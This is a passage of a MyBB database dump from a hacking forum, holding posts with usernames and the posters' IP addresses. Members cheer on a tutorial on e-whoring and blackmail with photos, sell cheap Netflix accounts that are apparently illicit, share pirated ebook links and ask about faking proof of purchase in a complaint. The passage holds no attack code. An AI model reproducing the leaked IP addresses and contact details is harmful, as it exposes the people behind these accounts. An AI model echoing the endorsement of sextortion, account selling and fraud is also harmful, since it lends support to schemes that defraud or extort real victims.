'0', '0', '0', '1', 'fe22bb5087b07847edb4dd07f598798d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('672', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '62', 'R?????zo?', '1345749863', 'thanks for this. looks great', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b6a62506035d495f36eb903eb0b21312', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('673', '81', '191', '12', 'RE: [tut]How to spread your server', '0', '82', 'iTzIpod', '1345750602', 'ROFL. I laughed at this tutorial! <3 Nice tutorial! Used it on my Adf.ly link :p http://adf.ly/C5YAg My Referral Link.', '24.212.197.164', '416597412', '1', '0', '82', '1345751512', '1', '036fb9159964e86506e817939154056b', '0', '1345751512'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('674', '94', '479', '16', 'RE: What is this section about?', '0', '82', 'iTzIpod', '1345751596', '[quote=\'p420\' pid=\'479\' dateline=\'1345505982\'] [quote=\'sirchamp\' pid=\'457\' dateline=\'1345469119\'] Nearly the exact same text on wikipedia. But thanks anyway :D [/quote] Grrrr.. You had to do your research. [/quote] ROFL! But oh well. Nice explanation on Social Engineering!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c0d2a6ec9193c03e6206deceb37c6e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('675', '39', '99', '17', 'RE: E-Whoring Pics Pack of 11 girls', '0', '82', 'iTzIpod', '1345751702', 'Nice release! Thanks! <3 I will use it once I master E-Whoring', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '86e8dd7a23c5de47335970750f0d66b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('676', '26', '79', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '82', 'iTzIpod', '1345752102', 'I never tried E-Whoring before. :/ I want to try it!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a294ef20b22d398c3f234d0d6a9af697', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('677', '193', '0', '59', '150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1345752929', '150 FREE EBOOKS ABOUT HACKING 1. HACKING - GENERAL Coding+Tut Computer Virus 4 Dummies Ethical Hacking and Countermeasures Extreme Tech Hacking Gmail Google_Secrets Gray_Hat_Hacking Hacking Exposed 6th Edition Hacking For Beginners Hacking for Dummies - Kevin Beaver Hacking Secrets Revealed How To Hack Hacker Highschool Kevin Mitnick - Ghost in the wires Kevin Mitnick - The Art of Deception Kevin Mitnick - The Art of Intrusion Telnet Tutorial The Ethical Hack The Hackers Underground Handbook Website_Hacking_Secrets Wi-fi security [url=http://adf.ly/CAFom]Download Click Here [/url] 2. SQL TUTORIALS Mastering_MySQL_4.2003.Sybex MySQL - 2nd Edition (Sams) MySQL - Essential Skills (2004) MySQL - Visual QuickStart Guide, 2nd Edition (2006) MySQL Certification Study Guide (2004) MySQL Cookbook (2002) MySQL Cookbook MySQL Pocket Reference (2003) MySQL Tutorial (2003) MySQL.PHP.Database.Applications SQL - A Beginner\'s Guide, 2nd Edition (2003) SQL - Practical Guide For Developers (2005) SQL Bible (2003) SQL Cookbook (2005) SQL For Dummies, 6th Edition (2006) SQL Sams Teach Yourself MySQL in 21 Days -- SAMS SQL Server 2000 [url=http://adf.ly/CAG5U]Download Click Here [/url] 3. NETWORK SECURITY Cryptography And Network Security, 4th Edition (2005).chm Designing And Implementing Linux Firewalls And QoS (2006) Firewall Policies And VPN Configurations (2006) Fundamentals of Network Security LANSecurity Maximum Computer Security-A Hacker\'s Guide McGraw Hill - Hacking Exposed - Network Security, Secrets Network Security Assessment - From Vulnerability To Patch (2006) Network Security Hacks - 100 Industrial-Strength Tips & Tools Network Security With OpenSSL (2002) Self-Defending Networks - The Next Generation Of Network Security [url=http://adf.ly/CAGGl]Download Click Here [/url] 4. NETWORK PROGRAMMING Illustrated TCP-IP - A Graphic Guide To The Protocol Suite (1999) Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version Tcp Ip For Dummies TCP-IP Foundations (2004) TCP-IP Network Administration, 3rd Edition (2002) TCPIPSettingsinDOS TCPIP Tools Understanding TCP-IP (2006) Unix Network Programming - Volume I - The Sockets Networking API, 3rd Edition (2003) [url=http://adf.ly/CAGLd]Download Click Here [/url] 5. UNIX A Practical Guide To Linux Commands, Editors, And Shell Programming (2005) Absolute BSD - The Ultimate Guide To FreeBSD (2002) Absolute OpenBSD - Unix For The Practical Paranoid 2003 Embedded FreeBSD Cookbook (2002) Get_Acquainted_with_Linux_Security_and_Optimization_System Hack Proofing Linux - A Guide To Open Source Security (2001) Learning the UNIX Operating System 4th ed 1998. Linux Basic Commands Linux Kernel Development, 2nd Edition Linux Kernel module programming guide 1 Linux Shell Scripting With Bash (2004) linuxKernelSux Linux_Administration_Made_Easy Linux_Administrators_Security_Guide Mastering FreeBSD And OpenBSD Security (2005) McGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU OReilly - Linux_Network_Administrator\'s_Guide_Second_Edition OReilly.Understanding.The Linux Kernel 1st Edition Sam teach you Linux in 24 hours Securing Linux A Survival Guide for Linux Security Version 1.0 Securing Linux Server for Service Providers SELinux (2004) shell-scripting SysAdmin - Security Tools in FreeBSD Teach Yourself FreeBSD In 24 Hours (2003) The Complete FreeBSD, 4th Edition (2003) The OpenBSD 4.0 Crash Course (2007) Understanding The Linux Kernel, 3rd Edition (2005) Unix Power Tools, 3rd Edition (2002).chm Unix Shell Programming, 3rd Edition (2003) [url=http://adf.ly/CAGO4]Download Click Here [/url] 6. PROGRAMMING Advanced Perl Programming, 2nd Edition (2005) Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition (2000) Beginning Linux Programming Beginning Perl Web Development - From Novice To Professional (2006) Burtch - Linux Shell Scripting with Bash (2004) C By Example (1999) C In A Nutshell (2005).chm C Primer Plus, 5th Edition (2004) C-C++ Programmer\'s Reference, 3rd Edition (2003) Cryptography In C And C++ (2001) Effective C++, 3rd Edition (2005) Glass,Ables - Linux for Programmers and Users (Prentice, 2006) Guide To Assembly Language Programming In Linux (2005) Hacker Disassembling Uncovered Intermediate Perl (2006) Korn Shell Unix and Linux Programming Manual, 3rd ed 2001 Learning Perl Objects, References, & Modules (2003) Learning Perl, 4th Edition (2005) Learning PHP & MySQL (2006) Matthew - Beginning Linux Programming 4e (Wrox, 2007) Michael - Mastering UNIX Shell Scripting (Wiley, 2003) Minimal Perl For UNIX And Linux People (2005) Mitchell - Advanced Linux Programming (New Riders, 2001) Optimizing C++ (1999) Perl Best Practices (2005) Perl Cookbook Perl Hacks - Tips And Tools For Programming Debugging And Surviving (2006) Perl Medic - Transforming Legacy Code (2004) Programming Embedded Systems In C And C++ (1999) Secure Programming Cookbook For C And C++ (2003) Wall - Linux Programming Unleashed (SAMS, 1999) [url=http://adf.ly/CAGVo]Download Click Here [/url] 7. EXPLOIT Extreme Exploits - Advanced Defenses Against Hardcore Hacks (2005) Hacking - The Art Of Exploitation (2003) Shellcoder\'s Programming Uncovered (2005) The Shellcoder\'s Handbook - Discovering And Exploiting Security Holes (2004) [url=http://adf.ly/CAGZ3]Download Click Here [/url] Credits: mschauhdry I take no credit for this. Sorry for the Adf.ly links. I am in need of money. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8365a98010c393e56a003b81cc8f6dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('678', '130', '662', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345753327', '[quote=\'NXK\' pid=\'662\' dateline=\'1345744483\'] This is nice, I have my own API like this And iv been thinking about creating one but I guess you got that under control! Nice release. [/quote] Whoops, my api is down :| Looks like you are the next Creator :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'daaebc7f389b40ae0826ce5c4d155fb6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('679', '190', '665', '56', 'RE: Copy and paste game', '0', '67', 'HoverCatz', '1345753553', 'http://l33thacking.com/showthread.php?tid=130 :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '4b16a88bfc8e3478c0c09d256c9bb6c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('680', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '82', 'iTzIpod', '1345753707', 'Seems nice! I will download. And post results. [hr] EDIT: I got this message on my first attempt! :/ Error: Index was outside the bounds of the array.', '24.212.197.164', '416597412', '1', '0', '82', '1345754004', '1', '0abbf34300b08ae173cd6c80876b0789', '0', '1345754004'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('681', '194', '0', '16', 'So i got this from redbull.', '0', '90', 'duhuh', '1345757587', '[code]Thank you for contacting us and for bringing your experience to our attention. I would like to take this opportunity to assure you that this type of occurrence is extremely rare at Red Bull and we take all complaints very seriously. Unfortunately without the can in question it would be impossible for us to ascertain exactly what has happened on this occasion, so we would appreciate it if you would let us know the following information: - Proof of Purchase - Which product did you buy (in which sized can?) - Where was the can purchased from? - When did you buy it? - What was the use by date? - What were the time and production codes? (Found on the bottom of our cans and is 7 digits long)[/code] so i didn\'t think i needed this stuff, can i just fake it all? does it matter?', '86.182.139.218', '1454803930', '0', '0', '90', '1345757600', '1', '6551bc02ff1dfaca6a9f93f679ad6efb', '0', '1345757600'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('682', '193', '677', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '90', 'duhuh', '1345757719', '[quote=\'iTzIpod\' pid=\'677\' dateline=\'1345752929\'] Sorry for the Adf.ly links. I am in need of money. :/ [/quote] you not going to make much money from this :P', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '8b7404cd6d8077f63737bb16194af841', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('683', '184', '671', '35', 'RE: [Video] I\'m a video editor!', '0', '61', 'NXK', '1345757794', '[quote=\'iTzIpod\' pid=\'671\' dateline=\'1345749808\'] [quote=\'NXK\' pid=\'660\' dateline=\'1345738559\'] [quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\'] It\'s alright. Also, if I ever got a video I need edited, I will come to you. =] What game is this? Also, what system? PS3, Xbox 360, PC? [/quote] It\'s counter strike source for PC [/quote] Oh. Do you have a HDPVR with a Xbox 360 or Ps3 with CoD Games? :p [/quote] No I do not. The only footage I edit of console games is pre recorded.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'efa2cb8a7685364403d32727450b4a46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('684', '187', '640', '3', 'RE: Public Downloads?', '0', '1', 't3h jok3r', '1345758374', 'I actually agree with R?????zo? and iTzIpod. We currently need activity and need some bumps on good giveaways and tutorials as well.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '14eaab6ae476d5abf48953a51491ea3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('685', '189', '652', '49', 'RE: Webmaster Section', '0', '1', 't3h jok3r', '1345758526', 'You want to turn LH into HF. I can\'t afford that to happen, because L33THacking is another site and HF is another site with more of whitehat stuff. As said earlier, I will add a webmaster and gaming section BUT after we get more members because I can\'t let that section die like the coding and almost the graphics section is dying. I added the marketplace upon a users request and it\'s not even being used. More sections will be added when we get more members to participate in those sections. Leaving this suggestion open for further discussion.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '96eb77465433ffcc6784b6756927d565', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('686', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1345758826', 'R?????zo? I copied that when I was answering a suggestion thread.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '4db0944992846b3db5349d712792f923', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('687', '192', '667', '49', 'RE: [Suggestion] Forum Games Section', '0', '1', 't3h jok3r', '1345758882', 'Nice Suggestion, Also it would be a great idea for people that are bored can post on there and it will increase our activity as well.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '7f5ff5825add71d30980595b09f40193', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('688', '195', '0', '39', '[Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1345759118', '[img]http://i.imgur.com/qyaZT.png[/img] Hey LH, iTzIpod here with Netflix Accounts for sale. I am selling each Netflix Account for 75 cents. I currently have 50+ in stock. But I am planning on getting more. In the meantime, add my Skype for further discussion. - iTzIpod [b]These accounts have a 1 month guarantee and also, I do not accept Beli. Also, these accounts will work anywhere in North America I give 24 hour refunds after purchase. If the accounts don\'t work, I will either give you a refund, or a new account.[/b] Contact Info: Skype: [Spoiler] iTzIpod [/Spoiler] MSN/Email: [Spoiler] iTzIpod@hotmail.com [/Spoiler] Vouches: [Spoiler] None! :( Total: 0 [/Spoiler] Accounts Sold: [Spoiler] None! :( [/Spoiler] I might make a Thread Design for this.', '24.212.197.164', '416597412', '1', '0', '82', '1345916425', '1', '4221e2369977824175197058c04689ba', '0', '1345916425'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('689', '171', '602', '8', 'RE: What Genre do you listen to?', '0', '1', 't3h jok3r', '1345764660', '[quote=\'iTzIpod\' pid=\'602\' dateline=\'1345596178\'] [quote=\'t3h jok3r\' pid=\'589\' dateline=\'1345594547\'] I have no idea either, I guess hip hop is when it contains break dance because not all rap songs contain break dance. [/quote] You\'re right about the rap part. I just noticed that :p I will find it very hard for someone to Breakdance to Drake :p [/quote] I also noticed it yesterday LOL.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '60c3d11d73c2949fd369d2a51c6863a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('690', '192', '687', '49', 'RE: [Suggestion] Forum Games Section', '0', '82', 'iTzIpod', '1345765244', '[quote=\'t3h jok3r\' pid=\'687\' dateline=\'1345758882\'] Nice Suggestion, Also it would be a great idea for people that are bored can post on there and it will increase our activity as well. [/quote] I agree with you there. But then one day you will have a member with 1000+ posts spamming his/her heart out and then be LQ and all. + Their posts will make 50% of the forum\'s activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '114e0c02ca85c82f4da422c1105370c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('691', '192', '667', '49', 'RE: [Suggestion] Forum Games Section', '0', '61', 'NXK', '1345765315', 'Are you implying I made my thread to boost my post count?', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'bbf747fd55b0d383b54e9589cb0ab565', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('692', '193', '682', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1345765352', '[quote=\'duhuh\' pid=\'682\' dateline=\'1345757719\'] [quote=\'iTzIpod\' pid=\'677\' dateline=\'1345752929\'] Sorry for the Adf.ly links. I am in need of money. :/ [/quote] you not going to make much money from this :P [/quote] It\'s worth a try. I\'m in need of money. Very desperate.. zD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '27793f95a3fcf977ea50eacee5865793', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('693', '196', '0', '3', 'IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345765632', 'Tomorrow, I will migrating to a new host. I will do a backup before the migration. This thread is just a heads up, just in case something goes wrong. I don\'t thing it would, but just in case. The reason is because of the 20 minutes downtime everyday and no activation emails being sent properly.', '41.151.128.202', '697794762', '1', '0', '0', '0', '1', 'ad5272939e8a9316a1ba1361cf2b83ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('694', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345766360', 'Oh Thank God. I kept getting the CloudFlare thing saying that the website was offline... Hopefully that problem will be fixed. Thanks T3H JOK3R! <3 #1 Admin pelease I am number 1 admin.', '24.212.197.164', '416597412', '1', '0', '2', '1345825920', '1', '19956fdd3497a4c5119b7327699ca29f', '0', '1345825920'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('696', '197', '0', '56', '/me Thread', '0', '82', 'iTzIpod', '1345766578', 'Hey LH, Really easy to play just start your post with: [code] /me [/code] I\'ll start. /me is le cool', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0dab2118472e18b5f4ff2b3d45539588', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('697', '196', '694', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '61', 'NXK', '1345766620', '[quote=\'iTzIpod\' pid=\'694\' dateline=\'1345766360\'] Oh Thank God. I kept getting the CloudFlare thing saying that the website was offline... Hopefully that problem will be fixed. Thanks T3H JOK3R! <3 #1 Admin [/quote] This, Iv been barley able to get online. This is good news!', '99.253.65.17', '1677541649', '0', '0', '61', '1345767695', '1', 'f2c560aee6e5611e887cd1c454c4fe92', '0', '1345767695'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('698', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345766825', '@NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bad37f10ea142bd5a386b7215138963a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('699', '196', '698', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345767008', '[quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\'] @NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM.. [/quote] Not just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', 'a982708897a7c317d7a5740757480d7d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('700', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345767072', 'T3h Jok3r is an awesome admin :D', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', '48b52a447bdd7f79d721d554505cdfff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('701', '196', '699', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345767787', '[quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\'] [quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\'] @NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM.. [/quote] Not just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO. [/quote] True. But hopefully this new host migration will have better host than this current one. By the way may I ask which host we are currently using?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '02759e9f8569c025051b4e533a686a15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('702', '197', '700', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345767878', '[quote=\'t3h jok3r\' pid=\'700\' dateline=\'1345767072\'] T3h Jok3r is an awesome admin :D [/quote] Rofl you did it wrong. You type /me and then type out a sentence. You don\'t type T3h Jok3r is awesome xD you type /me is awesome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd9916db699c46e72c958e6d21cd1e071', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('703', '196', '701', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345768309', '[quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\'] [quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\'] [quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\'] @NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM.. [/quote] Not just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO. [/quote] True. But hopefully this new host migration will have better host than this current one. By the way may I ask which host we are currently using? [/quote] Sorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', 'e987c403720c671a581d7df7a8a0cfec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('704', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '20', 'JakeUS', '1345768382', 'Thanks for the heads up.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '062d49da829adaf7ff9dd0e4406fc755', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('705', '175', '579', '42', 'RE: Is Apple really the most valuable company?', '0', '5', 'Timmy', '1345768451', 'Companies go up and down so Apple can be the most valuable company at the moment.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', '1bd5146e424ebc06c39f7df94c76a3a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('706', '197', '696', '56', 'RE: /me Thread', '0', '5', 'Timmy', '1345768498', 'Lol Jok3r. /me is Elite Member! :P [b]Edited[/b] WTF? My post got changed automatically to red and put my username.', '41.150.193.50', '697745714', '1', '0', '5', '1345768616', '1', '66c5467ede652dadcbda7f30dbad8929', '0', '1345768616'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('707', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '5', 'Timmy', '1345768990', 'I also receive the offline sign a lot. Thanks for heads up.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', 